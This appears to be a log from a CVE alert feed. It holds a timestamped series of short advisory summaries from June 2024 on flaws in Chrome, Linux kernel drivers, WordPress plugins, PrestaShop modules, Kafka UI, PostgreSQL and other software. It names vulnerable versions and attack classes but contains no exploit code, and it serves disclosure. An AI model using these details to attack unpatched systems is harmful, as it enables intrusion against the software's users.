🚨 CVE-2024-5835Heap buffer overflow in Tab Groups in Google Chrome prior to 126.0.6478.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:37:25 |
🚨 CVE-2024-5833Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:37:24 |
🚨 CVE-2024-5832Use after free in Dawn in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:07:31 |
🚨 CVE-2024-5842Use after free in Browser UI in Google Chrome prior to 126.0.6478.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 15:07:30 |
🚨 CVE-2024-5841Use after free in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 15:07:26 |
🚨 CVE-2024-5839Inappropriate Implementation in Memory Allocator in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 15:07:25 |
🚨 CVE-2024-5837Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 15:07:24 |
🚨 CVE-2022-28805singlevar in lparser.c in Lua from (including) 5.4.0 up to (excluding) 5.4.4 lacks a certain luaK_exp2anyregup call, leading to a heap-based buffer over-read that might affect a system that compiles untrusted Lua code.🎖@cveNotify |
|
| 2024-06-20 13:37:25 |
🚨 CVE-2024-5844Heap buffer overflow in Tab Strip in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 13:37:24 |
🚨 CVE-2024-5843Inappropriate implementation in Downloads in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to obfuscate security UI via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 13:07:28 |
🚨 CVE-2024-36580A Prototype Pollution issue in cdr0 sg 1.0.10 allows an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-06-20 13:07:27 |
🚨 CVE-2024-6057Improper authentication in the vault password feature in Devolutions Remote Desktop Manager 2024.1.31.0 and earlier allows an attacker that has compromised an access to an RDM instance to bypass the vault master password via the offline mode feature.🎖@cveNotify |
|
| 2024-06-20 13:07:26 |
🚨 CVE-2024-5847Use after free in PDFium in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 13:07:25 |
🚨 CVE-2024-5846Use after free in PDFium in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-20 12:37:27 |
🚨 CVE-2022-48727In the Linux kernel, the following vulnerability has been resolved:KVM: arm64: Avoid consuming a stale esr value when SError occurWhen any exception other than an IRQ occurs, the CPU updates the ESR_EL2register with the exception syndrome. An SError may also become pending,and will be synchronised by KVM. KVM notes the exception type, and whetheran SError was synchronised in exit_code.When an exception other than an IRQ occurs, fixup_guest_exit() updatesvcpu->arch.fault.esr_el2 from the hardware register. When an SError wassynchronised, the vcpu esr value is used to determine if the exceptionwas due to an HVC. If so, ELR_EL2 is moved back one instruction. Thisis so that KVM can process the SError first, and re-execute the HVC ifthe guest survives the SError.But if an IRQ synchronises an SError, the vcpu's esr value is stale.If the previous non-IRQ exception was an HVC, KVM will corrupt ELR_EL2,causing an unrelated guest instruction to be executed twice.Check ARM_EXCEPTION_CODE() before messing with ELR_EL2, IRQs don'tupdate this register so don't need to check.🎖@cveNotify |
|
| 2024-06-20 12:37:26 |
🚨 CVE-2022-48725In the Linux kernel, the following vulnerability has been resolved:RDMA/siw: Fix refcounting leak in siw_create_qp()The atomic_inc() needs to be paired with an atomic_dec() on the errorpath.🎖@cveNotify |
|
| 2024-06-20 12:37:25 |
🚨 CVE-2021-4439In the Linux kernel, the following vulnerability has been resolved:isdn: cpai: check ctr->cnr to avoid array index out of boundThe cmtp_add_connection() would add a cmtp session to a controllerand run a kernel thread to process cmtp. __module_get(THIS_MODULE); session->task = kthread_run(cmtp_session, session, "kcmtpd_ctr_%d", session->num);During this process, the kernel thread would call detach_capi_ctr()to detach a register controller. if the controllerwas not attached yet, detach_capi_ctr() wouldtrigger an array-index-out-bounds bug.[ 46.866069][ T6479] UBSAN: array-index-out-of-bounds indrivers/isdn/capi/kcapi.c:483:21[ 46.867196][ T6479] index -1 is out of range for type 'capi_ctr *[32]'[ 46.867982][ T6479] CPU: 1 PID: 6479 Comm: kcmtpd_ctr_0 Not tainted5.15.0-rc2+ #8[ 46.869002][ T6479] Hardware name: QEMU Standard PC (i440FX + PIIX,1996), BIOS 1.14.0-2 04/01/2014[ 46.870107][ T6479] Call Trace:[ 46.870473][ T6479] dump_stack_lvl+0x57/0x7d[ 46.870974][ T6479] ubsan_epilogue+0x5/0x40[ 46.871458][ T6479] __ubsan_handle_out_of_bounds.cold+0x43/0x48[ 46.872135][ T6479] detach_capi_ctr+0x64/0xc0[ 46.872639][ T6479] cmtp_session+0x5c8/0x5d0[ 46.873131][ T6479] ? __init_waitqueue_head+0x60/0x60[ 46.873712][ T6479] ? cmtp_add_msgpart+0x120/0x120[ 46.874256][ T6479] kthread+0x147/0x170[ 46.874709][ T6479] ? set_kthread_struct+0x40/0x40[ 46.875248][ T6479] ret_from_fork+0x1f/0x30[ 46.875773][ T6479]🎖@cveNotify |
|
| 2024-06-20 10:37:38 |
🚨 CVE-2024-26807In the Linux kernel, the following vulnerability has been resolved:Both cadence-quadspi ->runtime_suspend() and ->runtime_resume()implementations start with: struct cqspi_st *cqspi = dev_get_drvdata(dev); struct spi_controller *host = dev_get_drvdata(dev);This obviously cannot be correct, unless "struct cqspi_st" is thefirst member of " struct spi_controller", or the other way around, butit is not the case. "struct spi_controller" is allocated bydevm_spi_alloc_host(), which allocates an extra amount of memory forprivate data, used to store "struct cqspi_st".The ->probe() function of the cadence-quadspi driver then sets thedevice drvdata to store the address of the "struct cqspi_st"structure. Therefore: struct cqspi_st *cqspi = dev_get_drvdata(dev);is correct, but: struct spi_controller *host = dev_get_drvdata(dev);is not, as it makes "host" point not to a "struct spi_controller" butto the same "struct cqspi_st" structure as above.This obviously leads to bad things (memory corruption, kernel crashes)directly during ->probe(), as ->probe() enables the device using PMruntime, leading the ->runtime_resume() hook being called, which inturns calls spi_controller_resume() with the wrong pointer.This has at least been reported [0] to cause a kernel crash, but theexact behavior will depend on the memory contents.[0] https://lore.kernel.org/all/20240226121803.5a7r5wkpbbowcxgx@dhruva/This issue potentially affects all platforms that are currently usingthe cadence-quadspi driver.🎖@cveNotify |
|
| 2024-06-20 08:37:44 |
🚨 CVE-2024-38620In the Linux kernel, the following vulnerability has been resolved:Bluetooth: HCI: Remove HCI_AMP supportSince BT_HS has been remove HCI_AMP controllers no longer has any use soremove it along with the capability of creating AMP controllers.Since we no longer need to differentiate between AMP and Primarycontrollers, as only HCI_PRIMARY is left, this also removehdev->dev_type altogether.🎖@cveNotify |
|
| 2024-06-20 07:37:26 |
🚨 CVE-2024-4098The Shariff Wrapper plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.6.13 via the shariff3uu_fetch_sharecounts function. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-06-20 07:37:25 |
🚨 CVE-2024-38619In the Linux kernel, the following vulnerability has been resolved:usb-storage: alauda: Check whether the media is initializedThe member "uzonesize" of struct alauda_info will remain 0if alauda_init_media() fails, potentially causing divide errorsin alauda_read_data() and alauda_write_lba().- Add a member "media_initialized" to struct alauda_info.- Change a condition in alauda_check_media() to ensure the first initialization.- Add an error check for the return value of alauda_init_media().🎖@cveNotify |
|
| 2024-06-20 07:37:24 |
🚨 CVE-2023-25646There is an unauthorized access vulnerability in ZTE H388X. If H388X is caused by brute-force serial port cracking,attackers with common user permissions can use this vulnerability to obtain elevated permissions on the affected device by performing specific operations.🎖@cveNotify |
|
| 2024-06-20 06:37:30 |
🚨 CVE-2024-5522The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks🎖@cveNotify |
|
| 2024-06-20 06:37:26 |
🚨 CVE-2024-5475The Responsive video embed WordPress plugin before 0.5.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-06-20 06:37:25 |
🚨 CVE-2024-1300A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.🎖@cveNotify |
|
| 2024-06-20 06:37:24 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-06-20 04:37:39 |
🚨 CVE-2024-5605The Media Library Assistant plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter within the mla_tag_cloud Shortcode in all versions up to, and including, 3.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-20 04:37:38 |
🚨 CVE-2024-35241Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing specially crafted branch names in the repository can be used to execute code. Patches for this issue are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid installing dependencies via git by using `--prefer-dist` or the `preferred-install: dist` config setting.🎖@cveNotify |
|
| 2024-06-20 03:37:31 |
🚨 CVE-2024-5213In mintplex-labs/anything-llm versions up to and including 1.5.3, an issue was discovered where the password hash of a user is returned in the response after login (`POST /api/request-token`) and after account creations (`POST /api/admin/users/new`). This exposure occurs because the entire User object, including the bcrypt password hash, is included in the response sent to the frontend. This practice could potentially lead to sensitive information exposure despite the use of bcrypt, a strong hashing algorithm. It is recommended not to expose any clues about passwords to the frontend.🎖@cveNotify |
|
| 2024-06-20 02:37:54 |
🚨 CVE-2024-4742The Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the order_by shortcode attribute in all versions up to, and including, 1.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-20 02:37:50 |
🚨 CVE-2024-3627The Wheel of Life: Coaching and Assessment Tool for Life Coach plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in the AjaxFunctions.php file in all versions up to, and including, 1.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts and modify settings.🎖@cveNotify |
|
| 2024-06-20 02:37:49 |
🚨 CVE-2024-3602The Pop ups, Exit intent popups, email popups, banners, bars, countdowns and cart savers – Promolayer plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the disconnect_promolayer function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to remove the Promolayer connection.🎖@cveNotify |
|
| 2024-06-20 02:37:48 |
🚨 CVE-2024-3597The Export WP Page to Static HTML/CSS plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 2.2.2. This is due to insufficient validation on the redirect url supplied via the rc_exported_zip_file parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.🎖@cveNotify |
|
| 2024-06-20 02:37:45 |
🚨 CVE-2024-3562The Custom Field Suite plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.6.7 via the Loop custom field. This is due to insufficient sanitization of input prior to being used in a call to the eval() function. This makes it possible for authenticated attackers, with contributor-level access and above, to execute arbitrary PHP code on the server.🎖@cveNotify |
|
| 2024-06-20 02:37:44 |
🚨 CVE-2024-1168The SEOPress – On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's social image URL in all versions up to, and including, 7.9 due to insufficient input sanitization and output escaping on user supplied image URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-20 02:37:43 |
🚨 CVE-2023-3204The Materialis theme for WordPress is vulnerable to limited arbitrary options updates in versions up to, and including, 1.1.24. This is due to missing authorization checks on the companion_disable_popup() function called via an AJAX action. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to modify any option on the site to a numerical value.🎖@cveNotify |
|
| 2024-06-20 00:37:40 |
🚨 CVE-2024-6103Use after free in Dawn in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 00:37:36 |
🚨 CVE-2024-6102Out of bounds memory access in Dawn in Google Chrome prior to 126.0.6478.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-20 00:37:35 |
🚨 CVE-2024-5182A path traversal vulnerability exists in mudler/localai version 2.14.0, where an attacker can exploit the `model` parameter during the model deletion process to delete arbitrary files. Specifically, by crafting a request with a manipulated `model` parameter, an attacker can traverse the directory structure and target files outside of the intended directory, leading to the deletion of sensitive data. This vulnerability is due to insufficient input validation and sanitization of the `model` parameter.🎖@cveNotify |
|
| 2024-06-20 00:37:34 |
🚨 CVE-2024-0985Late privilege drop in REFRESH MATERIALIZED VIEW CONCURRENTLY in PostgreSQL allows an object creator to execute arbitrary SQL functions as the command issuer. The command intends to run SQL functions as the owner of the materialized view, enabling safe refresh of untrusted materialized views. The victim is a superuser or member of one of the attacker's roles. The attack requires luring the victim into running REFRESH MATERIALIZED VIEW CONCURRENTLY on the attacker's materialized view. Versions before PostgreSQL 16.2, 15.6, 14.11, 13.14, and 12.18 are affected.🎖@cveNotify |
|
| 2024-06-19 21:37:25 |
🚨 CVE-2024-34990In the module "Help Desk - Customer Support Management System" (helpdesk) up to version 2.4.0 from FME Modules for PrestaShop, a customer can upload .php files. Methods `HelpdeskHelpdeskModuleFrontController::submitTicket()` and `HelpdeskHelpdeskModuleFrontController::replyTicket()` allow upload of .php files on a predictable path for connected customers.🎖@cveNotify |
|
| 2024-06-19 21:37:24 |
🚨 CVE-2024-33836In the module "JA Marketplace" (jamarketplace) up to version 9.0.1 from JA Module for PrestaShop, a guest can upload files with extensions .php. In version 6.X, the method `JmarketplaceproductModuleFrontController::init()` and in version 8.X, the method `JmarketplaceSellerproductModuleFrontController::init()` allow upload of .php files, which will lead to a critical vulnerability.🎖@cveNotify |
|
| 2024-06-19 20:37:30 |
🚨 CVE-2024-38358Wasmer is a web assembly (wasm) Runtime supporting WASIX, WASI and Emscripten. If the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both `oflags::creat` and `rights::fd_write`. Programs can also crash the runtime by creating a symlink pointing outside with `path_symlink` and `path_open`ing the link. This issue has been addressed in commit `b9483d022` which has been included in release version 4.3.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-06-19 20:37:26 |
🚨 CVE-2024-38356TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code were able to be executed when content was extracted from the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that, when using the `noneditable_regexp` option, any content within an attribute is properly verified to match the configured regular expression before being added. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-06-19 20:37:25 |
🚨 CVE-2024-34993In the module "Bulk Export products to Google Merchant-Google Shopping" (bagoogleshopping) up to version 1.0.26 from Buy Addons for PrestaShop, a guest can perform SQL injection via`GenerateCategories::renderCategories().🎖@cveNotify |
|
| 2024-06-19 20:37:24 |
🚨 CVE-2024-5564A vulnerability was found in libndp. This flaw allows a local malicious user to cause a buffer overflow in NetworkManager, triggered by sending a malformed IPv6 router advertisement packet. This issue occurred as libndp was not correctly validating the route length information.🎖@cveNotify |
|
| 2024-06-19 17:37:24 |
🚨 CVE-2024-32030Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security lab and is also tracked as GHSL-2023-230.🎖@cveNotify |
|
| 2024-06-19 15:37:25 |
🚨 CVE-2024-38439Netatalk 3.2.0 has an off-by-one error and resultant heap-based buffer overflow because of setting ibuf[PASSWDLEN] to '\0' in FPLoginExt in login in etc/uams/uams_pam.c.🎖@cveNotify |
|
| 2024-06-19 14:37:36 |
🚨 CVE-2024-23443A high-privileged user, allowed to create custom osquery packs 17 could affect the availability of Kibana by uploading a maliciously crafted osquery pack.🎖@cveNotify |
|
| 2024-06-19 14:37:35 |
🚨 CVE-2023-39310Missing Authorization vulnerability in ThemeFusion Fusion Builder.This issue affects Fusion Builder: from n/a through 3.11.1.🎖@cveNotify |
|
| 2024-06-19 14:37:31 |
🚨 CVE-2023-37872Missing Authorization vulnerability in Woo WooCommerce Ship to Multiple Addresses.This issue affects WooCommerce Ship to Multiple Addresses: from n/a through 3.8.5.🎖@cveNotify |
|
| 2024-06-19 14:37:30 |
🚨 CVE-2023-36684Missing Authorization vulnerability in Brainstorm Force Convert Pro.This issue affects Convert Pro: from n/a through 1.7.5.🎖@cveNotify |
|
| 2024-06-19 14:37:29 |
🚨 CVE-2023-36676Missing Authorization vulnerability in Brainstorm Force Spectra.This issue affects Spectra: from n/a through 2.6.6.🎖@cveNotify |
|
| 2024-06-19 13:38:03 |
🚨 CVE-2023-39998Missing Authorization vulnerability in Muffingroup Betheme.This issue affects Betheme: from n/a through 27.1.1.🎖@cveNotify |
|
| 2024-06-19 13:38:02 |
🚨 CVE-2023-39990Missing Authorization vulnerability in Paid Memberships Pro.This issue affects Paid Memberships Pro: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-06-19 13:38:01 |
🚨 CVE-2023-39922Missing Authorization vulnerability in ThemeFusion Avada.This issue affects Avada: from n/a through 7.11.1.🎖@cveNotify |
|
| 2024-06-19 13:37:58 |
🚨 CVE-2023-38386Missing Authorization vulnerability in Saturday Drive Ninja Forms.This issue affects Ninja Forms: from n/a through 3.6.25.🎖@cveNotify |
|
| 2024-06-19 13:37:57 |
🚨 CVE-2023-36512Missing Authorization vulnerability in Woo AutomateWoo.This issue affects AutomateWoo: from n/a through 5.7.5.🎖@cveNotify |
|
| 2024-06-19 13:37:56 |
🚨 CVE-2023-35049Missing Authorization vulnerability in WooCommerce WooCommerce Stripe Payment Gateway.This issue affects WooCommerce Stripe Payment Gateway: from n/a through 7.4.0.🎖@cveNotify |
|
| 2024-06-19 12:37:42 |
🚨 CVE-2023-47681Missing Authorization vulnerability in QuadLayers WooCommerce Checkout Manager.This issue affects WooCommerce Checkout Manager: from n/a through 7.3.0.🎖@cveNotify |
|
| 2024-06-19 12:37:41 |
🚨 CVE-2023-46146Missing Authorization vulnerability in Themify Themify Ultra.This issue affects Themify Ultra: from n/a through 7.3.5.🎖@cveNotify |
|
| 2024-06-19 12:37:37 |
🚨 CVE-2023-45658Missing Authorization vulnerability in POSIMYTH Nexter.This issue affects Nexter: from n/a through 2.0.3.🎖@cveNotify |
|
| 2024-06-19 12:37:36 |
🚨 CVE-2023-44148Missing Authorization vulnerability in Brainstorm Force Astra Bulk Edit.This issue affects Astra Bulk Edit: from n/a through 1.2.7.🎖@cveNotify |
|
| 2024-06-19 12:37:35 |
🚨 CVE-2023-40608Missing Authorization vulnerability in Paid Memberships Pro Paid Memberships Pro CCBill Gateway.This issue affects Paid Memberships Pro CCBill Gateway: from n/a through 0.3.🎖@cveNotify |
|
| 2024-06-19 12:37:34 |
🚨 CVE-2023-40004Missing Authorization vulnerability in ServMask All-in-One WP Migration Box Extension, ServMask All-in-One WP Migration OneDrive Extension, ServMask All-in-One WP Migration Dropbox Extension, ServMask All-in-One WP Migration Google Drive Extension.This issue affects All-in-One WP Migration Box Extension: from n/a through 1.53; All-in-One WP Migration OneDrive Extension: from n/a through 1.66; All-in-One WP Migration Dropbox Extension: from n/a through 3.75; All-in-One WP Migration Google Drive Extension: from n/a through 2.79.🎖@cveNotify |
|
| 2024-06-19 11:37:44 |
🚨 CVE-2024-35780Deserialization of Untrusted Data vulnerability in Live Composer Team Page Builder: Live Composer.This issue affects Page Builder: Live Composer: from n/a through 1.5.42.🎖@cveNotify |
|
| 2024-06-19 11:37:43 |
🚨 CVE-2024-35765Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wpsoul Greenshift – animation and page builder blocks allows Stored XSS.This issue affects Greenshift – animation and page builder blocks: from n/a through 8.8.9.1.🎖@cveNotify |
|
| 2024-06-19 11:37:42 |
🚨 CVE-2023-48761Missing Authorization vulnerability in Crocoblock JetElements For Elementor.This issue affects JetElements For Elementor: from n/a through 2.6.13.🎖@cveNotify |
|
| 2024-06-19 11:37:39 |
🚨 CVE-2023-48760Missing Authorization vulnerability in Crocoblock JetElements For Elementor.This issue affects JetElements For Elementor: from n/a through 2.6.13.🎖@cveNotify |
|
| 2024-06-19 11:37:38 |
🚨 CVE-2023-47788Missing Authorization vulnerability in Automattic Jetpack.This issue affects Jetpack: from n/a before 12.7.🎖@cveNotify |
|
| 2024-06-19 11:37:37 |
🚨 CVE-2023-47771Missing Authorization vulnerability in ThemePunch OHG Essential Grid.This issue affects Essential Grid: from n/a through 3.0.18.🎖@cveNotify |
|
| 2024-06-19 09:37:32 |
🚨 CVE-2024-4632The WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘custom_upload_mimes’ function in versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-19 09:37:31 |
🚨 CVE-2024-5685Users with "User:edit" and "Self:api" permissions can promote or demote themselves or other users by performing changes to the group's memberships via API call.This issue affects snipe-it: from v4.6.17 through v6.4.1.🎖@cveNotify |
|
| 2024-06-19 08:37:30 |
🚨 CVE-2024-0789The WP Maintenance plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 6.1.9.2 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to bypass maintenance mode.🎖@cveNotify |
|
| 2024-06-19 07:38:31 |
None |
|
| 2024-06-19 07:37:31 |
🚨 CVE-2024-3894The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an Image Title in all versions up to, and including, 3.2.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-19 07:37:30 |
🚨 CVE-2024-37387Use of potentially dangerous function issue exists in Ricoh Streamline NX PC Client. If this vulnerability is exploited, files in the PC where the product is installed may be altered.🎖@cveNotify |
|
| 2024-06-19 07:37:26 |
🚨 CVE-2024-36978In the Linux kernel, the following vulnerability has been resolved:net: sched: sch_multiq: fix possible OOB write in multiq_tune()q->bands will be assigned to qopt->bands to execute subsequent code logicafter kmalloc. So the old q->bands should not be used in kmalloc.Otherwise, an out-of-bounds write will occur.🎖@cveNotify |
|
| 2024-06-19 07:37:25 |
🚨 CVE-2024-36252Improper restriction of communication channel to intended endpoints issue exists in Ricoh Streamline NX PC Client ver.3.6.x and earlier. If this vulnerability is exploited, arbitrary code may be executed on the PC where the product is installed.🎖@cveNotify |
|
| 2024-06-19 07:37:24 |
🚨 CVE-2024-1407The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to subscribe to, modify, or cancel membership for a user via a forged request granted they can trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-19 06:37:31 |
🚨 CVE-2024-6132The Pexels: Free Stock Photos plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'pexels_fsp_images_options_validate' function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-06-19 06:37:30 |
🚨 CVE-2024-5853The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the sirv_upload_file_by_chanks AJAX action in all versions up to, and including, 7.2.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-06-19 06:37:26 |
🚨 CVE-2024-5208An uncontrolled resource consumption vulnerability exists in the `upload-link` endpoint of mintplex-labs/anything-llm. This vulnerability allows attackers to cause a denial of service (DOS) by shutting down the server through sending invalid upload requests. Specifically, the server can be made to shut down by sending an empty body with a 'Content-Length: 0' header or by sending a body with arbitrary content, such as 'asdasdasd', with a 'Content-Length: 9' header. The vulnerability is reproducible by users with at least a 'Manager' role, sending a crafted request to any workspace. This issue indicates that a previous fix was not effective in mitigating the vulnerability.🎖@cveNotify |
|
| 2024-06-19 06:37:25 |
🚨 CVE-2024-4369An information disclosure flaw was found in OpenShift's internal image registry operator. The AZURE_CLIENT_SECRET can be exposed through an environment variable defined in the pod definition, but is limited to Azure environments. An attacker controlling an account that has high enough permissions to obtain pod information from the openshift-image-registry namespace could use this obtained client secret to perform actions as the registry operator's Azure service account.🎖@cveNotify |
|
| 2024-06-19 05:37:25 |
🚨 CVE-2024-3229The Salon booking system plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the SLN_Action_Ajax_ImportAssistants function along with missing authorization checks in all versions up to, and including, 10.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-06-19 05:37:24 |
🚨 CVE-2024-35298Improper authorization in handler for custom URL scheme issue in 'ZOZOTOWN' App for Android versions prior to 7.39.6 allows an attacker to lead a user to access an arbitrary website via another application installed on the user's device. As a result, the user may become a victim of a phishing attack.🎖@cveNotify |
|
| 2024-06-19 04:37:47 |
🚨 CVE-2024-5724The Photo Video Gallery Master plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5.3 via deserialization of untrusted input 'PVGM_all_photos_details' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-06-19 04:37:46 |
🚨 CVE-2024-5649The Universal Slider plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.5 via deserialization of untrusted input 'fsl_get_gallery_value' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-06-19 04:37:43 |
